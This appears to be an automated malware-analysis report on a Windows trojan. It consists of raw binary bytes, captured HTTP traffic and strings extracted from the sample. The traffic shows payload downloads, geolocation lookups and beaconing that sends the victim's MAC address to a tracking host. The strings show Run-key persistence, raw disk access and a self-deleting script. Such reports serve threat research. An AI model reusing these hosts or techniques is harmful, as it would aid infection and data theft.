..E.7|G...Xi..\..].d?n/@.....P... c.0....].N.564.$.../...`...\.(....P.
"...........d...)..H............#..b...~c....VO.v.Fe.D.9..4...........
..xJ............Ll...K..?V ../..h.C.u....g.q.lI1....w..s ..Ji..snO..5.
.&.."C....H.gg......OW)@.i7...........$Mp6:4,"...A'..D5o.....J2 p.h{y.
...)Cm.C~7.\;......c}....*Z .,..#E.T.]5..._SuN<AR?9.`....B..&......
.y.g........J.v.........WS..$*.c..,'..t...-...`..yy..jBF6\>..w.:..|
.qA..W.... H.....,.......Cr.jSu....p@...Oy*K..&...e.......x}.w..5Z....
.Y85.`"..1U...K?.T. .... ..8;H&Iz....g7|..P5.m9C.....L4."...lG.P_.....
...$.u..mI.f3L....S/j.A@..{...zs.....02..q....a<..i.[......`.......
;........S5...}...... ....18L....Rx..o{...d.X.......7E......R...[...1)
..[...3..c.....=.....y......~.I6.Bo..y.......<...l..o..s.l.t......E
....P .m.....&F.t.V..3..w...4.o.m#.....zSDH.R.0..E.%.'.{.......%..Xc.H
io.~>.......z.p.K.`.....q.2......9.F..F...3...\...i'....5..|..~..l.
.1zB..Z...$...KF.C.......GMuw.._.}L..w.G..,.=#.6p.c.D.bz....Y..`.3...b
?.dS-e0...3...t2'...dX...&)... ..X...3R....t......u.B...@...S.U%......
..H.........Z........LK..u.....4.:..o...'3.[..dO&....-*&.u..?..l...../
c.i.._{.>K....f.Tp.w. ......f..._9.....b.............._G........z..
=.f:e/f........x..2.1O.......}..y...Y=LG...!..l......$u. ...r....

<<< skipped >>>

GET /ips.asp?ip=194.242.96.218&action=2 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: VVV.ip138.com
Cache-Control: no-cache


HTTP/1.0 302 Moved Temporarily
Server: Cdn Cache Server V2.0
Date: Mon, 09 Jan 2017 19:55:56 GMT
Content-Length: 0
Location: hXXp://city.ip138.com/ips.htm?ip=194.242.96.218&action=2


GET /download/src2011.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Connection: keep-alive
Referer: hXXp://dl.jyrili.com/download/src2011.exe
Content-Type: application/x-www-form-urlencoded
Host: dl.jyrili.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: Tengine
Content-Type: application/octet-stream
Content-Length: 1420400
Connection: keep-alive
Date: Mon, 09 Jan 2017 19:13:45 GMT
Last-Modified: Wed, 04 Jan 2017 06:02:16 GMT
ETag: "586c8fe8-15ac70"
Accept-Ranges: bytes
Via: cache1.l2nu17[0,304-0,H], cache18.l2nu17[0,0], kunlun4.cn345[0,200-0,H], kunlun10.cn345[0,0]
Age: 2534
X-Cache: HIT TCP_MEM_HIT dirn:10:903694853
X-Swift-SaveTime: Mon, 09 Jan 2017 19:47:38 GMT
X-Swift-CacheTime: 3600
Timing-Allow-Origin: *
EagleId: 1bdd1e0a14839917594785101e
MZP.....................@.............................................
..!..L.!..This program must be run under Win32..$7....................
......................................................................
..............................................PE..L....^B*............
.........F....................@..........................@......g.....
@......@..............................P........ ...........k...@......
......................................................................
..............CODE....0........................... ..`DATA....P.......
....................@...BSS......................................idata
..P...........................@....tls................................
.....rdata..............................@..P.reloc....................
..........@..P.rsrc.... .......,..................@..P.............@..
....................@..P..............................................
......................................................................
..............................................string................&l
t;.@.....m.@..........)@..(@..(@..)@.....$)@..Free..0)@..InitInstance.
.L)@..CleanupInstance..h(@..ClassType..l(@..ClassName...(@..ClassNameI
s...(@..ClassParent...)@..ClassInfo...(@..InstanceSize...)@..InheritsF
rom...)@..Dispatch...)@..MethodAddress..<*@..MethodName..x*@..Field
Address...)@..DefaultHandler...(@..NewInstance...(@..FreeInstance.TObj
ect.@...@..% .@....%..@....%..@....%..@....%..@....%..@....%..@....%(.
@....%..@....%..@....%..@....%..@....%..@....%..@....%..@....%..@.

<<< skipped >>>

GET /ip2city.asp HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: city.ip138.com
Cache-Control: no-cache
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Mon, 09 Jan 2017 19:55:58 GMT
Server: Microsoft-IIS/6.0
Content-Length: 211
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSSDBACSR=GKEEAHNBJOHCBMOMIJDPCDKK; path=/
Cache-control: private
<html>..<head>..<meta http-equiv="content-type" content
="text/html; charset=gb2312">..<title> ....IP.... </title&
gt;..</head>..<body style="margin:0px"><center>....I
P........[194.242.96.218] </center></body></html>HTT
P/1.1 200 OK..Date: Mon, 09 Jan 2017 19:55:58 GMT..Server: Microsoft-I
IS/6.0..Content-Length: 211..Content-Type: text/html..Set-Cookie: ASPS
ESSIONIDSSDBACSR=GKEEAHNBJOHCBMOMIJDPCDKK; path=/..Cache-control: priv
ate..<html>..<head>..<meta http-equiv="content-type" co
ntent="text/html; charset=gb2312">..<title> ....IP.... </t
itle>..</head>..<body style="margin:0px"><center>
....IP........[194.242.96.218] </center></body></html&g
t;
....



GET /ips.htm?ip=194.242.96.218&action=2 HTTP/1.1

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: city.ip138.com
Cache-Control: no-cache
Connection: Keep-Alive
Cookie: ASPSESSIONIDSSDBACSR=GKEEAHNBJOHCBMOMIJDPCDKK


HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Length: 323
Content-Type: text/html
Last-Modified: Sat, 21 Apr 2012 01:52:32 GMT
Accept-Ranges: bytes
ETag: "3a3cc6a611fcd1:9a8"
Server: Microsoft-IIS/6.0
Date: Mon, 09 Jan 2017 19:55:57 GMT
<html>..<head>..<meta http-equiv="Content-Type" content
="text/html; charset=gb2312">..<title>IP........</title>
;..</head>..<body>..<script type="text/javascript">.
.location.href="hXXp://VVV.ip138.com/ips138.asp" location.search;..&
lt;/script> ..<a href="hXXp://VVV.ip138.com/ips138.asp">IP...
...........</a>..</body>..</html>HTTP/1.1 200 OK..Ca
che-Control: max-age=86400..Content-Length: 323..Content-Type: text/ht
ml..Last-Modified: Sat, 21 Apr 2012 01:52:32 GMT..Accept-Ranges: bytes
..ETag: "3a3cc6a611fcd1:9a8"..Server: Microsoft-IIS/6.0..Date: Mon, 09
Jan 2017 19:55:57 GMT..<html>..<head>..<meta http-equi
v="Content-Type" content="text/html; charset=gb2312">..<title>
;IP........</title>..</head>..<body>..<script typ
e="text/javascript">..location.href="hXXp://VVV.ip138.com/ips138.as
p" location.search;..</script> ..<a href="hXXp://VVV.ip138.
com/ips138.asp">IP..............</a>..</body>..</htm
l>
....



GET /ip2city.asp HTTP/1.1

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: city.ip138.com
Cache-Control: no-cache
Connection: Keep-Alive
Cookie: ASPSESSIONIDSSDBACSR=GKEEAHNBJOHCBMOMIJDPCDKK


HTTP/1.1 200 OK
Date: Mon, 09 Jan 2017 19:56:23 GMT
Server: Microsoft-IIS/6.0
Content-Length: 211
Content-Type: text/html
Cache-control: private
<html>..<head>..<meta http-equiv="content-type" content
="text/html; charset=gb2312">..<title> ....IP.... </title&
gt;..</head>..<body style="margin:0px"><center>....I
P........[194.242.96.218] </center></body></html>HTT
P/1.1 200 OK..Date: Mon, 09 Jan 2017 19:56:23 GMT..Server: Microsoft-I
IS/6.0..Content-Length: 211..Content-Type: text/html..Cache-control: p
rivate..<html>..<head>..<meta http-equiv="content-type"
content="text/html; charset=gb2312">..<title> ....IP.... <
;/title>..</head>..<body style="margin:0px"><center&
gt;....IP........[194.242.96.218] </center></body></htm
l>
....



GET /ips.htm?ip=194.242.96.218&action=2 HTTP/1.1

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: city.ip138.com
Cache-Control: no-cache
Connection: Keep-Alive
Cookie: ASPSESSIONIDSSDBACSR=GKEEAHNBJOHCBMOMIJDPCDKK


HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Length: 323
Content-Type: text/html
Last-Modified: Sat, 21 Apr 2012 01:52:32 GMT
Accept-Ranges: bytes
ETag: "3a3cc6a611fcd1:9a8"
Server: Microsoft-IIS/6.0
Date: Mon, 09 Jan 2017 19:56:23 GMT
<html>..<head>..<meta http-equiv="Content-Type" content
="text/html; charset=gb2312">..<title>IP........</title>
;..</head>..<body>..<script type="text/javascript">.
.location.href="hXXp://VVV.ip138.com/ips138.asp" location.search;..&
lt;/script> ..<a href="hXXp://VVV.ip138.com/ips138.asp">IP...
...........</a>..</body>..</html>HTTP/1.1 200 OK..Ca
che-Control: max-age=86400..Content-Length: 323..Content-Type: text/ht
ml..Last-Modified: Sat, 21 Apr 2012 01:52:32 GMT..Accept-Ranges: bytes
..ETag: "3a3cc6a611fcd1:9a8"..Server: Microsoft-IIS/6.0..Date: Mon, 09
Jan 2017 19:56:23 GMT..<html>..<head>..<meta http-equi
v="Content-Type" content="text/html; charset=gb2312">..<title>
;IP........</title>..</head>..<body>..<script typ
e="text/javascript">..location.href="hXXp://VVV.ip138.com/ips138.as
p" location.search;..</script> ..<a href="hXXp://VVV.ip138.
com/ips138.asp">IP..............</a>..</body>..</htm
l>
....



GET /ip2city.asp HTTP/1.1

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: city.ip138.com
Cache-Control: no-cache
Connection: Keep-Alive
Cookie: ASPSESSIONIDSSDBACSR=GKEEAHNBJOHCBMOMIJDPCDKK


HTTP/1.1 200 OK
Date: Mon, 09 Jan 2017 19:56:47 GMT
Server: Microsoft-IIS/6.0
Content-Length: 211
Content-Type: text/html
Cache-control: private
<html>..<head>..<meta http-equiv="content-type" content
="text/html; charset=gb2312">..<title> ....IP.... </title&
gt;..</head>..<body style="margin:0px"><center>....I
P........[194.242.96.218] </center></body></html>HTT
P/1.1 200 OK..Date: Mon, 09 Jan 2017 19:56:47 GMT..Server: Microsoft-I
IS/6.0..Content-Length: 211..Content-Type: text/html..Cache-control: p
rivate..<html>..<head>..<meta http-equiv="content-type"
content="text/html; charset=gb2312">..<title> ....IP.... <
;/title>..</head>..<body style="margin:0px"><center&
gt;....IP........[194.242.96.218] </center></body></htm
l>
....



GET /ips.htm?ip=194.242.96.218&action=2 HTTP/1.1

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: city.ip138.com
Cache-Control: no-cache
Connection: Keep-Alive
Cookie: ASPSESSIONIDSSDBACSR=GKEEAHNBJOHCBMOMIJDPCDKK


HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Length: 323
Content-Type: text/html
Last-Modified: Sat, 21 Apr 2012 01:52:32 GMT
Accept-Ranges: bytes
ETag: "3a3cc6a611fcd1:9a8"
Server: Microsoft-IIS/6.0
Date: Mon, 09 Jan 2017 19:56:47 GMT
<html>..<head>..<meta http-equiv="Content-Type" content
="text/html; charset=gb2312">..<title>IP........</title>
;..</head>..<body>..<script type="text/javascript">.
.location.href="hXXp://VVV.ip138.com/ips138.asp" location.search;..&
lt;/script> ..<a href="hXXp://VVV.ip138.com/ips138.asp">IP...
...........</a>..</body>..</html>HTTP/1.1 200 OK..Ca
che-Control: max-age=86400..Content-Length: 323..Content-Type: text/ht
ml..Last-Modified: Sat, 21 Apr 2012 01:52:32 GMT..Accept-Ranges: bytes
..ETag: "3a3cc6a611fcd1:9a8"..Server: Microsoft-IIS/6.0..Date: Mon, 09
Jan 2017 19:56:47 GMT..<html>..<head>..<meta http-equi
v="Content-Type" content="text/html; charset=gb2312">..<title>
;IP........</title>..</head>..<body>..<script typ
e="text/javascript">..location.href="hXXp://VVV.ip138.com/ips138.as
p" location.search;..</script> ..<a href="hXXp://VVV.ip138.
com/ips138.asp">IP..............</a>..</body>..</htm
l>..


GET /locater/WMServiceLocater.asmx/GetServiceLocationsForClient?locale=en-US&clientType=VISTA_GAMES&clientVersion=6.1.2 HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: GamesWebServiceLocations
Host: movie.metaservices.microsoft.com


HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Type: text/xml; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 09 Jan 2017 19:55:32 GMT
Connection: close
Content-Length: 660
<?xml version="1.0" encoding="utf-8"?>..<ServiceLocaterRespon
se xmlns:xsi="hXXp://VVV.w3.org/2001/XMLSchema-instance" xmlns:xsd="ht
tp://VVV.w3.org/2001/XMLSchema" xmlns="hXXp://VVV.microsoft.com/Micros
oft.WindowsMedia.Services.Platform.Apps.Mds.Locater">.. <Servic
es>.. <ServiceLocation>.. <Name>Games</Name&
gt;.. <Url>hXXps://games.metaservices.microsoft.com/games/S
GamesWebService.asmx</Url>.. </ServiceLocation>.. &l
t;ServiceLocation>.. <Name>GamesFeedback</Name>..
<Url>hXXp://gamesfeedback.metaservices.microsoft.com/gamesF
eedback/GamesFeedbackWebService.asmx</Url>.. </ServiceLoca
tion>.. </Services>..</ServiceLocaterResponse>..


GET /tongji.php?ver=hongchen&mac=00:50:56:3C:AC:71&pid=2748&did=-1289677981&mid=axac HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: VVV.900cpa.cc:8080
Cache-Control: no-cache


HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/8.0
X-Powered-By: PHP/5.2.17
X-Powered-By: ASP.NET
Date: Mon, 09 Jan 2017 19:54:48 GMT
Content-Length: 8
........HTTP/1.1 200 OK..Content-Type: text/html..Server: Microsoft-II
S/8.0..X-Powered-By: PHP/5.2.17..X-Powered-By: ASP.NET..Date: Mon, 09
Jan 2017 19:54:48 GMT..Content-Length: 8..........
....



GET /tongji.php?ver=hongchen&mac=00:50:56:3C:AC:71&pid=2748&did=-1289677981&mid=axac HTTP/1.1

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: VVV.900cpa.cc:8080
Cache-Control: no-cache


HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/8.0
X-Powered-By: PHP/5.2.17
X-Powered-By: ASP.NET
Date: Mon, 09 Jan 2017 19:55:12 GMT
Content-Length: 6
......HTTP/1.1 200 OK..Content-Type: text/html..Server: Microsoft-IIS/
8.0..X-Powered-By: PHP/5.2.17..X-Powered-By: ASP.NET..Date: Mon, 09 Ja
n 2017 19:55:12 GMT..Content-Length: 6..........


GET /pki/crl/products/MicCodSigPCA_08-31-2010.crl HTTP/1.1
Cache-Control: max-age = 900
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Tue, 29 Oct 2013 05:02:50 GMT
If-None-Match: "b8b5df1d64d4ce1:0"
User-Agent: Microsoft-CryptoAPI/6.1
Host: crl.microsoft.com


HTTP/1.1 200 OK
Content-Type: application/pkix-crl
Last-Modified: Mon, 12 Dec 2016 06:00:18 GMT
Accept-Ranges: bytes
ETag: "7254ef33d54d21:0"
Server: Microsoft-IIS/8.5
VTag: 791789525600000000
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Content-Length: 554
Cache-Control: max-age=900
Date: Mon, 09 Jan 2017 19:56:22 GMT
Connection: keep-alive
0..&0......0...*.H........0y1.0...U....US1.0...U....Washington1.0...U.
...Redmond1.0...U....Microsoft Corporation1#0!..U....Microsoft Code Si
gning PCA..161211173324Z..170312055324Z.a0_0...U.#..0..........X..7.3.
..L...0... .....7.........0...U......b0... .....7......170311174324Z0.
..*.H..................)........j<.........G"...X..7y.1.s...vaE..'0
3.l......Q.*....M...$.._.:$...Ky$..`.>#..v...pLI<".1e.....0QK.#&
lt;#]v......x.d&..........@...{...K.gx1&...l.......R...>h.....$....
.........C..|M....WT..[.-.b.$)....v(....v._....'.p....a.)..j...oC....z
C:$.8....HTTP/1.1 200 OK..Content-Type: application/pkix-crl..Last-Mod
ified: Mon, 12 Dec 2016 06:00:18 GMT..Accept-Ranges: bytes..ETag: "725
4ef33d54d21:0"..Server: Microsoft-IIS/8.5..VTag: 791789525600000000..P
3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo O
UR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"..X-Powered-By: ASP.NET..C
ontent-Length: 554..Cache-Control: max-age=900..Date: Mon, 09 Jan 2017
19:56:22 GMT..Connection: keep-alive..0..&0......0...*.H........0y1.0
...U....US1.0...U....Washington1.0...U....Redmond1.0...U....Microsoft
Corporation1#0!..U....Microsoft Code Signing PCA..161211173324Z..17031
2055324Z.a0_0...U.#..0..........X..7.3...L...0... .....7.........0...U
......b0... .....7......170311174324Z0...*.H..................).......
.j<.........G"...X..7y.1.s...vaE..'03.l......Q.*....M...$.._.:$...K
y$..`.>#..v...pLI<".1e.....0QK.#<#]v......x.d&..........@...{
...K.gx1&...l.......R...>h.....$.............C..|M....WT..[.-.b

<<< skipped >>>

GET /MFUwUzBRME8wTTAJBgUrDgMCGgUABBTkLVLomfJQOu5CFIgPOR73ljBRHAQU+L36r3N3xscb+UtNEafRM6+vchECFEOZrYpYgDwxeWGj/HetMtWiXvU/ HTTP/1.1
Cache-Control: max-age = 339923
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Thu, 13 Oct 2016 09:41:21 GMT
If-None-Match: "c06e9a4e33eec9dd813b8faff15397229f914d2a"
User-Agent: Microsoft-CryptoAPI/6.1
Host: vassg142.ocsp.omniroot.com


HTTP/1.1 200 OK
Server: nginx
Content-Type: application/ocsp-response
Content-Length: 1746
Last-Modified: Mon, 09 Jan 2017 19:37:04 GMT
ETag: "ec45c567fc5214f03c43ba8d5e9f2c3d28f75278"
Cache-Control: public, no-transform, must-revalidate, max-age=339001
Expires: Fri, 13 Jan 2017 18:06:28 GMT
Date: Mon, 09 Jan 2017 19:56:27 GMT
Connection: keep-alive
0..........0..... .....0......0...0......\r...Ev.C..*....omJ...2017010
9193704Z0w0u0M0... .........-R...P:.B...9...0Q.......sw....KM...3..r..
.C...X.<1ya..w.2..^.?....20170109193704Z....20170113193704Z0...*.H.
.............}..N.u.......k.....nXE.,..?.f......f;$!p..U.)._M.|.. ....
.._.4.....B.. x.$.P.:.7...."..Y........#2.....f./..-..i..ZE..A........
.G.....,..95]w...-.y7........5._..d. Y..< .Ok_~.PMn..wC....Y....g.'
..<.W."v.o#o...|f.S./.......[|..J..8z.U.9...g. .#0.........!{....0.
..0...0...........1....n.SsnC.K.]I.w90...*.H........0..1.0...U....NL1.
0...U....Amsterdam1%0#..U....Verizon Enterprise Solutions1.0...U....Cy
bertrust1.0,..U...%Verizon Akamai SureServer CA G14-SHA20...1604070641
54Z..170407064154Z0..1.0...U....NL1.0...U....Amsterdam1%0#..U....Veriz
on Enterprise Solutions1.0...U....Cybertrust1%0#..U....vassg142-OCSP R
esponder 20160.."0...*.H.............0.........w.;..Eu..'f.c^....Qe.O.
..U.....d.\?.....S.r'g.d..ES.NA.t....<.....#?.."...*Pm.<..s.....
...v...<....8......A@.....7h...r$.T..8=......\....>......z=t3?(.
....i.>t.^.....]7.9..j.E. ....{.$w..Y,...hf..6......L._9,.....i...S
...)/.."^.K.O...bb^....V....'p...'V..........H0..D0... .....0......0L.
.U. .E0C0A.. .....>..0402.. ........&hXXps://secure.omniroot.com/re
pository0~.. ........r0p06.. .....0..*hXXps://cacert.a.omniroot.com/va
ssg142.crt06.. .....0..*hXXps://cacert.a.omniroot.com/vassg142.der0...
U...........0...U.%..0... .......0...U.#..0.......sw....KM...3..r.0...
U......\r...Ev.C..*....omJ.0...*.H.............l/0j.Z.z.......n-..

<<< skipped >>>

GET /ip2city.asp HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: VVV.ip138.com
Cache-Control: no-cache


HTTP/1.0 302 Moved Temporarily
Server: Cdn Cache Server V2.0
Date: Mon, 09 Jan 2017 19:56:19 GMT
Content-Length: 0
Location: hXXp://city.ip138.com/ip2city.asp


GET /CRL/Omniroot2025.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Sat, 16 Nov 2013 06:15:02 GMT
If-None-Match: "200da-5b6-4eb453c33260e"
User-Agent: Microsoft-CryptoAPI/6.1
Host: cdp1.public-trust.com


HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: application/x-pkcs7-crl
Date: Mon, 09 Jan 2017 19:55:41 GMT
Etag: "200c0-ca3-54535e76797e9"
Last-Modified: Tue, 03 Jan 2017 19:45:01 GMT
Server: ECS (arn/45CB)
X-Cache: HIT
Content-Length: 3235
0...0......0...*.H........0Z1.0...U....IE1.0...U....Baltimore1.0...U..
..CyberTrust1"0 ..U....Baltimore CyberTrust Root..170103190202Z..17033
1190202Z0...0....'k...120111220757Z0....'k...120111220847Z0....'.C..13
0130174530Z0....'....130807173059Z0....'....140122185220Z0....'....140
212185542Z0....'yr..150701184507Z0....'#...100303201301Z0....''q..1004
14175202Z0....'L...110224181251Z0....'Pn..110309142119Z0....'....10021
6203312Z0....'#...100303201213Z0....'3#..100908172555Z0....''n..101208
175627Z0....''m..101208175749Z0....''p..101208175916Z0....'H...1101141
62156Z0#...'X>..110815145134Z0.0...U.......0#...'Z2..110818184101Z0
.0...U.......0....'g...120111164333Z0....'g...120111164409Z0....'g...1
20111164519Z0....'....100216213519Z0....''s..100414175225Z0....''k..10
0414181839Z0....'3"..100908172705Z0....'3$..100908172728Z0....''o..101
208175645Z0....''l..101208175727Z0....'H...110119195142Z0....'Nz..1103
02154045Z0....'c...111207220933Z0....'g...120111164445Z0....''r..10041
4175143Z0....'8...101012182723Z0....'e...120111163041Z0....'VJ..110714
160903Z0....'s...130123162633Z0....'....130904190524Z0....'....1310242
14319Z0....'....140129172435Z0....'....140129172453Z0....'....13102421
4310Z0....'....135Z0....'s...161202213035Z0....'.C..161202213035Z0....
'....161202213035Z0....'....161202213035Z0....'....161202213035Z0....'
....161202213035Z0....'<...161202213035Z0....'k...161214171929Z0...
.'k...161214171929Z0....'k...161214171929Z0....'o...170103190202Z0....
'....170103190202Z..0.0...U.......E0...*.H.................. .;...

<<< skipped >>>

GET /MFQwUjBQME4wTDAJBgUrDgMCGgUABBQmECJms4f7i5EbxtN7NbzQCBwAdAQUUa8kJpz0aCJXgCYrO0ZiFXsezKUCE1oAAqF15UlAVwhXc+YAAQACoXU= HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.msocsp.com


HTTP/1.1 200 OK
Date: Mon, 09 Jan 2017 19:55:46 GMT
Content-Type: application/ocsp-response
Content-Length: 1820
Connection: keep-alive
Set-Cookie: __cfduid=d7e1e04fd4e94588f0795a5adab74f5221483991746; expires=Tue, 09-Jan-18 19:55:46 GMT; path=/; domain=.msocsp.com; HttpOnly
Last-Modified: Mon, 09 Jan 2017 17:22:32 GMT
Expires: Fri, 13 Jan 2017 17:22:32 GMT
ETag: "baeb3b785b82d293b20f180a8018c16b1629be18"
Cache-Control: max-age=10800,public,no-transform,must-revalidate
X-Cache: HIT
CF-Cache-Status: HIT
Server: cloudflare-nginx
CF-RAY: 31ea72dfc3a24014-SOF
0..........0..... .....0......0...0..........<.|7...@N6p.I.e|..2017
0109172232Z0..0..0L0... ........&."f........{5.....t..Q.$&..h"W.& ;Fb.
{.....Z...u.I@W.Ws......u....20170109172232Z....20170113172232Z."0 0..
. .....0......20160110172232Z0...*.H..................Z........;b.tM..
.\..._...wj..".......0.v .F.....0.....~.o...m..|......6/.8..`$=...cPJq
p.Z..I..Ie....z......P5}.._N...1!I.0...ap...W..[......m.S...~.f.....@-
.%...LGq.o...bn..H.oh...RX.\.....m..J.....@..G...o.........F..KSWK....
.T......~:....h(iS..c..Q.....0...0...0..........Z..*`.P... ......*`0..
.*.H........0..1.0...U....US1.0...U....Washington1.0...U....Redmond1.0
...U....Microsoft Corporation1.0...U....Microsoft IT1.0...U....Microso
ft IT SSL SHA20...161104200327Z..170118200327Z0!1.0...U....Should be i
gnore by CA0.."0...*.H.............0...........&!(..$.K...."=f....x.d.
._s.....j....9`..l.Z..............^f..u......-e.&.bG.(i.Q...........bE
y...^7A...A..c....CF-&...e.7..7F....."..w...y.:..`.w{~..D.x*.......x3O
s......q...... S.fB .ig.....L..3......4E..}..7...M....e ...6.M.O.....&
lt;5:......r.....]..A.5........0..0...U..........<.|7...@N6p.I.e|0.
..U.#..0...Q.$&..h"W.& ;Fb.{...0...U...........0=.. .....7...00..& ...
..7.....M..........}...t.O..........d...0...U.%..0... .......0... ....
.7....0.0... .......0... .....0......0...*.H.............8 .Mt].ERS.&p
|i._..Y'.........'....k.lu.S...lVZ."..U.. .. .'..D...a.....O_....]R...
..'..j..6.,.k.........Hm.~l..|..19..O........^1$.I.....{y[V..H;.2....p
...<X.O..I..H.!.`....n..v...........w..L6.K.Rd... O.......l.R._

<<< skipped >>>

GET /fwlink?linkid=30219&locale=en-US&clientType=VISTA_GAMES&clientVersion=6.1.2 HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: GamesWebServiceLocations
Host: go.microsoft.com


HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Location: hXXp://movie.metaservices.microsoft.com/locater/WMServiceLocater.asmx/GetServiceLocationsForClient?locale=en-US&clientType=VISTA_GAMES&clientVersion=6.1.2
Server: Microsoft-IIS/8.5
X-AspNetMvc-Version: 5.2
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 0
Date: Mon, 09 Jan 2017 19:55:32 GMT
Connection: keep-alive
HTTP/1.1 302 Moved Temporarily..Cache-Control: no-cache..Pragma: no-ca
che..Expires: -1..Location: hXXp://movie.metaservices.microsoft.com/lo
cater/WMServiceLocater.asmx/GetServiceLocationsForClient?locale=en-US&
clientType=VISTA_GAMES&clientVersion=6.1.2..Server: Microsoft-IIS/8.5.
.X-AspNetMvc-Version: 5.2..X-AspNet-Version: 4.0.30319..X-Powered-By:
ASP.NET..Content-Length: 0..Date: Mon, 09 Jan 2017 19:55:32 GMT..Conne
ction: keep-alive..


The Trojan connects to the servers at the folowing location(s):

%original file name%.exe_2180:

.text
`.rdata
@.data
.rsrc
t$(SSh
~%UVW
u$SShe
Jiu2.iu
1wK(.wS
wininet.dll
ws2_32.dll
IPHLPAPI.DLL
oleaut32.dll
ole32.dll
OleAut32.dll
kernel32.dll
ShellExecuteA
HttpOpenRequestA
HttpSendRequestA
HttpQueryInfoA
mm.exe
@.reloc
operator
GetProcessWindowStation
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
GET %s HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.4; en-US; rv:1.9b5) Gecko/2008032619 Firefox/3.0b5
Host: %s
,5-%d
Range:bytes=0-%s
POST /?%d HTTP/1.1
Content-Length: %d
X-%c: %c
hXXp://
VVV.%s
Windows 8
Windows 7
Windows Vista
Windows 2003
Windows XP
Windows 2000
Windows NT
Windows 2008
%d * %dMHz
dnsapi.dll
KERNEL32.dll
Software\Microsoft\Windows\CurrentVersion\Run
SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
.temp.fortest
\WindowsUpdate
F:\Projects\7
\20150606\Server\Release\Server.pdb
WS2_32.dll
DNSAPI.dll
WinExec
GetProcessHeap
GetCPInfo
USER32.dll
RegOpenKeyA
RegCloseKey
ADVAPI32.dll
ShellExecuteExA
SHELL32.dll
SHLWAPI.dll
zcÁ
MFC42.DLL
MSVCRT.dll
_acmdln
OLEAUT32.dll
function confirm(str){return true;}function alert(str){return true;}window.history.back(-1);
CWebBrowser2
88.200jh.com
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo><application xmlns="urn:schemas-microsoft-com:asm.v3"><windowsSettings><dpiAware xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware></windowsSettings></application></assembly>
0 0$0(0,00040~0
;*;/;;;@;_;
2 2$2024282
hXXp://VVV.ip138.com/ips.asp?ip=
hXXp://VVV.ip138.com/ip2city.asp
tem.vbs
fso.DeleteFile("
Set fso = CreateObject("Scripting.FileSystemObject")
Wscript.Sleep(1000)
hXXp://183.60.200.160:8080/yy.txt
</url>
<url>
https
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
http=
HTTP/1.1
Content-Type: application/x-www-form-urlencoded
hXXps://
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
hXXp://VVV.900cpa.cc:8080/tongji.php?ver=hongchen&mac=
{4590f811-1d3a-11d0-891f-00aa004b2e24}
{dc12a687-737f-11cf-884d-00aa004b2e24}
\\.\PhysicalDrive0
F%*.*f
CNotSupportedException
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
